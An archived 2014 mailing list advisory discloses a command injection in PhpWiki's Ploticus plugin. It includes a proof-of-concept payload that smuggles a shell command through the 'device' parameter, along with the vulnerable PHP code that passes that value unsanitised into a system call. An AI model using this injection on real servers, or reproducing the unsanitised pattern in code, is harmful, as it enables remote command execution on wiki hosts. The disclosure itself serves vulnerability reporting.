| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <20140827222345.2D3DEC0112@smtp.hushmail.com>
Date: Wed, 27 Aug 2014 23:23:45 +0100
From: "Benjamin Harris" <bch@...h.ai>
To: fulldisclosure@...lists.org, oss-security@...ts.openwall.com
Subject: [FD] PHP-Wiki Command Injection
Hi All
OSS-Security, can I get a CVE for this please?
URL: https://sourceforge.net/projects/phpwiki/
I tried to report this a month ago, but got no response from the
developers. This is an old vulnerability I found while dusting off
some old hard drives.
Brief:
-------------------------
PhpWiki is a WikiWikiWeb clone in PHP. A WikiWikiWeb is a site
where anyone can edit the pages through an HTML form. Multiple
storage backends, dynamic hyperlinking, themeable, scriptable by
plugins, full authentication, ACL's.
Details:
--------------------------
Straight command injection in the Ploticus module. Attached is a
working POC.
I found these notes I made:
<<Ploticus device=";touch /tmp/owned;" -prefab= -csmap= data= alt=
help= >>
$ ls -la owned
-rw-r--r-- 1 apache apache 0 Jan 18 15:23 owned
vuln code with system execute at the bottom
controllable param is $args
$gif = $argarray['device'];
$args = "-$gif -o $tempfile.$gif";
$code = $this->execute(PLOTICUS_EXE . "
$tempfile.plo $args", $tempfile.".$gif");
['device'] is listed as an option by user when using the Politus
plugin
"
example usage;
<?plugin Ploticus device||=png [ploticus options...]
multiline ploticus script ...
?>
:>>
function getImage($dbi, $argarray, $request) {
//extract($this->getArgs($argstr, $request));
//extract($argarray);
$source =& $this->source;
if (!empty($source)) {
if ($this->withShellCommand($source)) {
$this->_errortext .= _("shell commands not allowed
in Ploticus");
return false;
}
if (is_array($argarray['data'])) { // support <!plugin-
list !> pagelists
$src = "#proc getdata\ndata:";
$i = 0;
foreach ($argarray['data'] as $data) {
// hash or array?
if (is_array($data))
$src .= ("\t" . join(" ", $data) . "\n");
else
$src .= ("\t" . '"' . $data . '" ' . $i++ .
"\n");
}
$src .= $source;
$source = $src;
}
$tempfile = $this->tempnam('Ploticus','plo');
@unlink($tempfile);
$gif = $argarray['device'];
$args = "-$gif -o $tempfile.$gif";
if (!empty($argarray['-csmap'])) {
$args .= " -csmap -mapfile $tempfile.map";
$this->_mapfile = "$tempfile.map";
}
if (!empty($argarray['-prefab'])) {
//check $_ENV['PLOTICUS_PREFABS'] and default
directory
global $HTTP_ENV_VARS;
if (empty($HTTP_ENV_VARS['PLOTICUS_PREFABS'])) {
if (file_exists("/usr/share/ploticus"))
$HTTP_ENV_VARS['PLOTICUS_PREFABS'] =
"/usr/share/ploticus";
elseif (defined('PLOTICUS_PREFABS'))
$HTTP_ENV_VARS['PLOTICUS_PREFABS'] =
constant('PLOTICUS_PREFABS');
}
$args .= (" -prefab " . $argarray['-prefab']);
}
if (isWindows()) {
$fp = fopen("$tempfile.plo", "w");
fwrite ($fp, $source);
fclose($fp);
$code = $this->execute(PLOTICUS_EXE . "
$tempfile.plo $args", $tempfile.".$gif");
Many thanks,
Ben
View attachment "release.py" of type "text/x-python" (1855 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists